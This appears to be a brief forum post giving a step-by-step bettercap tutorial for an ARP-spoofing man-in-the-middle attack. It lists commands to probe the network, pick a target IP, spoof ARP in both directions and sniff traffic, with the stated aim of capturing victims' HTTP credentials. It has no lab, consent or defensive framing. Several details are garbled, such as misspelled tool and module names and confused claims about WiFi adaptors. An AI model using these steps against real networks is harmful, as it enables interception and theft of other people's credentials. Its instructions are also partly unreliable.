MITM Attack using better cap - anon0 - May 25, 2023
MITIM (MAN IN THE MIDDLE ATTACK):::
Requirements: PC,Linux,if possible WiFi adaptor
One terminal and start better cap by
---> battercap -iface(ur interface eg:eth0)
Then you can use "help" to list the commands and tools
We can to on the netprobe command
---> net.probe on
When we on this the bet.recon command will works automatic which is use to gain the recon of the browser
The next step is to use the arpspoof but before that we have to choice our target you can use the following command to list the IPS in your network
---> net.show
NOTE:- Without using WiFi adaptor u can't list the all IPS or users in your network. Without a adaptor u can only get your PC and Linux ids
Then we have to start arpspoofing which is used to manipulate the packets flow.You can use the following command for arp spoof help
---> help arp.spoof
Before using arp.spoof we have to change some settings
---> arp.spoof fullduplex true (To spoof both router and victims data)
Then put ur target IP by following
---> arp.spoof.targets 192.168.x.x
Now turn on arpspoof
---> arp.spoof on
Then we should sniff by using
---> net.sniff on
Now we can get the flow redirected to our PC and goes to the victim
In this method we can only get the credentials of http only
To get https and others we have to use caplets I will post that soon
